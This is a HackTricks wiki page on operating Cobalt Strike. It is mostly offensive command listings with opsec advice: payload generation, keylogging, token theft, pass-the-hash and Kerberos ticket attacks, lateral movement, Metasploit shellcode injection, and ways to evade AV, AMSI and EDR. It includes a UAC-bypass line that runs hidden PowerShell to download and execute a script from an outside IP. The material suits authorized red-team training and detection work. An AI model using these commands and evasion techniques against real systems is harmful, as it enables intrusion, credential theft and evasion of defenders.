cobalt-strike.md (25129B)
1 --- 2 title: "Cobalt Strike" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/cobalt-strike.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/cobalt-strike.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Cobalt Strike 14 15 ### Listeners 16 17 ### C2 Listeners 18 19 `Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more. 20 21 ### Peer2Peer Listeners 22 23 The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons. 24 25 `Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons 26 27 * The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon 28 * The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`. 29 30 ### Generate & Host payloads 31 32 #### Generate payloads in files 33 34 `Attacks -> Packages ->` 35 36 * **`HTMLApplication`** for HTA files 37 * **`MS Office Macro`** for an office document with a macro 38 * **`Windows Executable`** for a .exe, .dll orr service .exe 39 * **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs) 40 41 #### Generate & Host payloads 42 43 `Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python 44 45 #### Host Payloads 46 47 If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config. 48 49 ### Beacon Options 50 51 <details> 52 <summary>Beacon options and commands</summary> 53 54 ```bash 55 # Execute local .NET binary 56 execute-assembly </path/to/executable.exe> 57 # Note that to load assemblies larger than 1MB, the 'tasks_max_size' property of the malleable profile needs to be modified. 58 59 # Screenshots 60 printscreen # Take a single screenshot via PrintScr method 61 screenshot # Take a single screenshot 62 screenwatch # Take periodic screenshots of desktop 63 ## Go to View -> Screenshots to see them 64 65 # keylogger 66 keylogger [pid] [x86|x64] 67 ## View > Keystrokes to see the keys pressed 68 69 # portscan 70 portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process 71 portscan [targets] [ports] [arp|icmp|none] [max connections] 72 73 # Powershell 74 ## Import Powershell module 75 powershell-import C:\path\to\PowerView.ps1 76 powershell-import /root/Tools/PowerSploit/Privesc/PowerUp.ps1 77 powershell <just write powershell cmd here> # Uses the highest supported PowerShell version (not OPSEC-friendly) 78 powerpick <cmdlet> <args> # This creates a sacrificial process specified by spawnto, and injects UnmanagedPowerShell into it for better opsec (not logging) 79 powerpick Invoke-PrivescAudit | fl 80 psinject <pid> <arch> <commandlet> <arguments> # This injects UnmanagedPowerShell into the specified process to run the PowerShell cmdlet. 81 82 83 # User impersonation 84 ## Token generation with creds 85 make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network 86 ls \\computer_name\c$ # Try to use generated token to access C$ in a computer 87 rev2self # Stop using token generated with make_token 88 ## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9. 89 90 # UAC Bypass 91 elevate svc-exe <listener> 92 elevate uac-token-duplication <listener> 93 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))" 94 95 ## Steal token from pid 96 ## Like make_token but stealing the token from a process 97 steal_token [pid] # Also, this is useful for network actions, not local actions 98 ## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token. 99 ls \\computer_name\c$ # Try to use generated token to access C$ in a computer 100 rev2self # Stop using token from steal_token 101 102 ## Launch process with nwe credentials 103 spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\ 104 ## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName). 105 106 ## Inject into process 107 inject [pid] [x64|x86] [listener] 108 ## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86). 109 110 ## Pass the hash 111 ## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled. 112 pth [pid] [arch] [DOMAIN\user] [NTLM hash] 113 pth [DOMAIN\user] [NTLM hash] 114 115 ## Pass the hash through mimikatz 116 mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden" 117 ## Without /run, Mimikatz spawns cmd.exe; an interactive desktop user may see the shell (SYSTEM sessions are not normally visible) 118 steal_token <pid> #Steal token from process created by mimikatz 119 120 ## Pass the ticket 121 ## Request a ticket 122 execute-assembly /root/Tools/SharpCollection/Seatbelt.exe -group=system 123 execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec 124 ## Create a new logon session to use with the new ticket (to not overwrite the compromised one) 125 make_token <domain>\<username> DummyPass 126 ## Write the ticket on the attacker machine from a PowerShell session and load it 127 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]")) 128 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi 129 130 ## Pass the ticket from SYSTEM 131 ## Generate a new process with the ticket 132 execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe 133 ## Steal the token from that process 134 steal_token <pid> 135 136 ## Extract ticket + Pass the ticket 137 ### List tickets 138 execute-assembly C:\path\Rubeus.exe triage 139 ### Dump an interesting ticket by LUID 140 execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap 141 ### Create new logon session, note luid and processid 142 execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe 143 ### Insert ticket in generate logon session 144 execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...] 145 ### Finally, steal the token from that new process 146 steal_token <pid> 147 148 # Lateral Movement 149 ## If a token was created it will be used 150 jump [method] [target] [listener] 151 ## Methods: 152 ## psexec x86 Use a service to run a Service EXE artifact 153 ## psexec64 x64 Use a service to run a Service EXE artifact 154 ## psexec_psh x86 Use a service to run a PowerShell one-liner 155 ## winrm x86 Run a PowerShell script via WinRM 156 ## winrm64 x64 Run a PowerShell script via WinRM 157 ## wmi_msbuild x64 WMI lateral movement with an MSBuild inline C# task (OPSEC) 158 159 160 remote-exec [method] [target] [command] # remote-exec doesn't return output 161 ## Methods: 162 ## psexec Remote execute via Service Control Manager 163 ## winrm Remote execute via WinRM (PowerShell) 164 ## wmi Remote execute via WMI 165 166 ## To execute a beacon with wmi (it isn't in the jump command) just upload the beacon and execute it 167 beacon> upload C:\Payloads\beacon-smb.exe 168 beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe 169 170 171 # Pass session to Metasploit - Through listener 172 ## On the Metasploit host 173 msf6 > use exploit/multi/handler 174 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http 175 msf6 exploit(multi/handler) > set LHOST eth0 176 msf6 exploit(multi/handler) > set LPORT 8080 177 msf6 exploit(multi/handler) > exploit -j 178 179 ## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save. 180 beacon> spawn metasploit 181 ## You can only spawn x86 Meterpreter sessions with the foreign listener. 182 183 # Pass session to Metasploit - Through shellcode injection 184 ## On metasploit host 185 msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin 186 ## Run msfvenom and prepare the multi/handler listener 187 188 ## Copy bin file to cobalt strike host 189 ps 190 shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process 191 192 # Pass metasploit session to cobalt strike 193 ## Generate stageless Beacon shellcode: go to Attacks > Packages > Windows Executable (S), select the listener, choose Raw output, and enable the x64 payload. 194 ## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode 195 196 197 # Pivoting 198 ## Open a socks proxy in the teamserver 199 beacon> socks 1080 200 201 # SSH connection 202 beacon> ssh 10.10.17.12:22 username password 203 ``` 204 205 </details> 206 207 ### Custom implants / Linux Beacons 208 209 - A custom agent only needs to speak the Cobalt Strike Team Server HTTP/S protocol (default malleable C2 profile) to register/check-in and receive tasks. Implement the same URIs/headers/metadata crypto defined in the profile to reuse the Cobalt Strike UI for tasking and output.<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup> 210 - An Aggressor Script (e.g., `CustomBeacon.cna`) can wrap payload generation for the non-Windows beacon so operators can select the listener and produce ELF payloads directly from the GUI. 211 - Example Linux task handlers exposed to the Team Server: `sleep`, `cd`, `pwd`, `shell` (exec arbitrary commands), `ls`, `upload`, `download`, and `exit`. These map to task IDs expected by the Team Server and must be implemented server-side to return output in the proper format. 212 - BOF support on Linux can be added by loading Beacon Object Files in-process with [TrustedSec's ELFLoader](https://github.com/trustedsec/ELFLoader) (supports Outflank-style BOFs too), allowing modular post-exploitation to run inside the implant's context/privileges without spawning new processes.<sup>[[2]](#references)[[3]](#references)</sup> 213 - Embed a SOCKS handler in the custom beacon to keep pivoting parity with Windows Beacons: when the operator runs `socks <port>` the implant should open a local proxy to route operator tooling through the compromised Linux host into internal networks. 214 215 ## Opsec 216 217 ### Execute-Assembly 218 219 The **`execute-assembly`** uses a **sacrificial process** using remote process injection to execute the indicated program. This is very noisy as to inject inside a process certain Win APIs are used that every EDR is checking. However, there are some custom tools that can be used to load something in the same process: 220 221 - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly) 222 - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly) 223 - In Cobalt Strike you can also use BOF (Beacon Object Files): [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET) 224 225 The agressor script `https://github.com/outflanknl/HelpColor` will create the `helpx` command in Cobalt Strike which will put colors in commands indicating if they are BOFs (green), if they are Frok&Run (yellow) and similar, or if they are ProcessExecution, injection or similar (red). Which helps to know which commands are more stealthy. 226 227 ### Modern in-process post-execution 228 229 Recent versions add two alternatives when a classic COFF BOF is too constrained: 230 231 - **Beacon Interpreter** compiles C on the Team Server to intermediate bytecode and executes it in a VM embedded in Beacon. The bytecode remains data rather than native executable code, so this avoids the extra executable allocation and RW-to-RX permission transition normally required to load a BOF. Scripts can import the Beacon API and declare BOF-style Dynamic Function Resolution (DFR) prototypes. 232 - **BOF-PE** loads a complete EXE or DLL in the current Beacon. This format supports normal PE imports, exception handling, richer C++ and external libraries while retaining the Beacon API. This is heavier than a small COFF BOF, so choose it only when the additional runtime is useful. 233 234 ```bash 235 # Compile a C script on the Team Server and execute its bytecode 236 beacon-interpreter /path/to/script.c 237 238 # Execute a BOF-PE in the current Beacon 239 inline-execute-pe /path/to/tool.x64.exe 240 ``` 241 242 These mechanisms reduce loader-related signals, not the telemetry produced by the script's actions or Windows API calls.<sup>[[8]](#references)</sup> 243 244 ### Act as the user 245 246 You could check events like `Seatbelt.exe LogonEvents ExplicitLogonEvents PoweredOnEvents`: 247 248 - Security EID 4624 - Check all the interactive logons to know the usual operating hours. 249 - System EID 12,13 - Check the shutdown/startup/sleep frequency. 250 - Security EID 4624/4625 - Check inbound valid/invalid NTLM attempts. 251 - Security EID 4648 - This event is created when plaintext credentials are used to logon. If a process generated it, the binary potentially has the credentials in clear text ina config file or inside the code. 252 253 When using `jump` from cobalt strike, it's better to use the `wmi_msbuild` method to make the new process look more legit. 254 255 ### Use computer accounts 256 257 It's common for defenders to be checking weird behaviours generated from users abd **exclude service accounts and computer accounts like `*$` from their monitoring**. You could use these accounts to perform lateral movement or privilege escalation. 258 259 ### Use stageless payloads 260 261 Stageless payloads are less noisy than staged ones because they don't need to download a second stage from the C2 server. This means that they don't generate any network traffic after the initial connection, making them less likely to be detected by network-based defenses. 262 263 ### Tokens & Token Store 264 265 Be careful when stealing or generating tokens because an EDR may enumerate thread tokens and detect a **token belonging to a different user** or even SYSTEM inside the process. 266 267 This allows to store tokens **per beacon** so it's not needed to steal the same token again and again. This is useful for lateral movement or when you need to use a stolen token multiple times: 268 269 - `token-store steal <pid>` 270 - `token-store steal-and-use <pid>` 271 - token-store show 272 - `token-store use <id>` 273 - `token-store remove <id>` 274 - token-store remove-all 275 276 When moving laterally, usually is better to **steal a token than to generate a new one** or perform a pass the hash attack. 277 278 ### Guardrails 279 280 Cobalt Strike has a feature called **Guardrails** that helps to prevent the use of certain commands or actions that could be detected by defenders. Guardrails can be configured to block specific commands, such as `make_token`, `jump`, `remote-exec`, and others that are commonly used for lateral movement or privilege escalation. 281 282 Moreover, the repo [https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks](https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks) also contains some checks and ideas you could consider before executing a payload. 283 284 ### Tickets encryption 285 286 In an AD be careful with the encryption of the tickets. By default, some tools will use RC4 encryption for Kerberos tickets, which is less secure than AES encryption and by default up to date environments will use AES. This can be detected by defenders who are monitoring for weak encryption algorithms. 287 288 ### Avoid Defaults 289 290 When using Cobalt Stricke by default the SMB pipes will have the name `msagent_####` and `"status_####`. Change those names. It's possible to check the names of the existing pipes from Cobal Strike with the command: `ls \\.\pipe\` 291 292 Moreover, with SSH sessions a pipe called `\\.\pipe\postex_ssh_####` is created. Chage it with `set ssh_pipename "<new_name>";`. 293 294 Also in poext exploitation attack the pipes `\\.\pipe\postex_####` can be modified with `set pipename "<new_name>"`. 295 296 In Cobalt Strike profiles you can also modify things like: 297 298 - Avoiding using `rwx` 299 - How the process injection behavior works (which APIs will be used) in the `process-inject {...}` block 300 - How the "fork and run" works in the `post-ex {…}` block 301 - The sleep time 302 - The max size of binaries to be loaded in memory 303 - The memory footprint and DLL content with `stage {...}` block 304 - The network traffic 305 306 ### Sleepmask and BeaconGate 307 308 A Sleepmask transforms Beacon and its tracked heap allocations while it is dormant, then restores them for task execution. Current releases provide an evasive default, but custom Sleepmask BOFs remain useful when memory layout, allocation or call-stack requirements differ. As of 4.13, the default Sleepmask also spoofs the return address for APIs proxied through BeaconGate.<sup>[[8]](#references)</sup> 309 310 **BeaconGate** extends this design beyond `Sleep`: selected WinAPI calls are represented as `FUNCTION_CALL` structures and forwarded to the Sleepmask BOF, which can mask Beacon while executing the call. The profile can gate a group (`Comms`, `Core`, `Cleanup` or `All`) or only individual APIs:<sup>[[9]](#references)</sup> 311 312 ```text 313 stage { 314 set sleep_mask "true"; 315 set syscall_method "Indirect"; 316 317 beacon_gate { 318 VirtualAlloc; # Routed through BeaconGate 319 VirtualAllocEx; 320 InternetConnectA; 321 } 322 } 323 ``` 324 325 For an API listed under `beacon_gate`, the gate takes precedence over `syscall_method`; APIs not listed can still use the configured syscall method. `beacon_gate disable` and `beacon_gate enable` toggle the feature at runtime. Avoid enabling `All` blindly: commands such as `ps` repeatedly call `OpenProcess`/`CloseHandle` and can produce a CPU spike when every call masks and unmasks Beacon. Sleepmask-VS provides mocked Beacon/Sleepmask state for debugging custom gates without repeatedly testing them through a live implant.<sup>[[9]](#references)</sup> 326 327 ### Noisy proc injections 328 329 When injecting code into a process this is usually very noisy, this is because **no regular process usually performs this action and because the ways to do this are very limited**. Tehrefore, it' could be detected by behaviour-based detection systems. Moroever, it could also be detected by EDRs scanning the network for **threads containing code that is not in disk** (although processes such as browsers using JIT have this commonly). Example: [https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) 330 331 ### Spawnas | PID and PPID relationships 332 333 When spawning a new process it's important to **maintain a regular parent-child** relationship between processes to avoid detection. If svchost.exec is executing iexplorer.exe it'll look suspicious, as svchost.exe is not a parent of iexplorer.exe in a normal Windows environment. 334 335 When a new beacon is spawned in Cobalt Strike by default a process using **`rundll32.exe`** is created to run the new listener. This is not very stealthy and can be easily detected by EDRs. Moreover, `rundll32.exe` is run without any args making it even more suspicious. 336 337 With the following Cobalt Strike command, you can specify a different process to spawn the new beacon, making it less detectable: 338 339 ```bash 340 spawnto x86 svchost.exe 341 ``` 342 343 You can aso change this setting **`spawnto_x86` and `spawnto_x64`** in a profile. 344 345 ### Proxying attackers traffic 346 347 Atters sometime will need to be able to run tools lically, even in linux machines and make the traffic of the victims reach the tool (e.g. NTLM relay). 348 349 Moreover, sometimes to do a pass-the.hash or pass-the-ticket attack it's stealthier for the attacker to **add this hash or ticket in his own LSASS process** locally and then pivot from it instead of modifying an LSASS process of a victim machine. 350 351 However, you need to be **careful with the generated traffic**, as you might be sending uncommon traffic (kerberos?) from your backdoor process. For this you could pivot to a browser process (although you could get caught injecting yourself into a process so think about a stealth way to do this). 352 353 354 ### Avoiding AVs 355 356 #### AV/AMSI/ETW Bypass 357 358 Check the page: 359 360 361 [Av Bypass](/hacktricks/windows-hardening/av-bypass) 362 363 364 #### Artifact Kit 365 366 Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons. 367 368 Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary. 369 370 After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`. 371 372 ```text 373 pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . 374 ``` 375 376 Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded. 377 378 #### Resource Kit 379 380 The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA. 381 382 Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it: 383 384 ```text 385 .\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1 386 ``` 387 388 Modifying the detected lines one can generate a template that won't be caught. 389 390 Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded. 391 392 #### Function hooks | Syscall 393 394 Function hooking is a very common method of ERDs to detect malicious activity. Cobalt Strike allows you to bypass these hooks by using **syscalls** instead of the standard Windows API calls using the **`None`** config, or use the `Nt*` version of a function with the **`Direct`** setting, or just jumping over the `Nt*` function with the **`Indirect`** option in the malleable profile. Depending on the system, an optino might be more stealth then the other. 395 396 This can be set in the profile or suing the command **`syscall-method`** 397 398 However, this could also be noisy. 399 400 Some option granted by Cobalt Strike to bypass function hooks is to remove those hooks with: [**unhook-bof**](https://github.com/Cobalt-Strike/unhook-bof). 401 402 You could also check with functions are hooked with [**https://github.com/Mr-Un1k0d3r/EDRs**](https://github.com/Mr-Un1k0d3r/EDRs) or [**https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector**](https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector) 403 404 405 <details> 406 <summary>Misc Cobalt Strike commands</summary> 407 408 ```bash 409 cd C:\Tools\neo4j\bin 410 neo4j.bat console 411 http://localhost:7474/ --> Change password 412 execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL 413 414 415 # Change powershell 416 C:\Tools\cobaltstrike\ResourceKit 417 template.x64.ps1 418 # Change $var_code -> $polop 419 # $x --> $ar 420 cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna 421 422 #artifact kit 423 cd C:\Tools\cobaltstrike\ArtifactKit 424 pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . 425 426 427 ``` 428 429 </details> 430 431 432 ## References 433 434 - [1] [Cobalt Strike Linux Beacon (custom implant PoC)](https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon) 435 - [2] [TrustedSec ELFLoader & Linux BOFs](https://github.com/trustedsec/ELFLoader) 436 - [3] [Outflank nix BOF template](https://github.com/outflanknl/nix_bof_template) 437 - [4] [Unit42 analysis of Cobalt Strike metadata encryption](https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/) 438 - [5] [SANS ISC diary on Cobalt Strike traffic](https://isc.sans.edu/diary/27968) 439 - [6] [cs-decrypt-metadata-py](https://blog.didierstevens.com/2021/10/22/new-tool-cs-decrypt-metadata-py/) 440 - [7] [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser) 441 - [8] [Cobalt Strike 4.13: Lost In Translation](https://www.cobaltstrike.com/blog/cobalt-strike-413-lost-in-translation) 442 - [9] [Cobalt Strike 4.10: Through the BeaconGate](https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate?p=6046)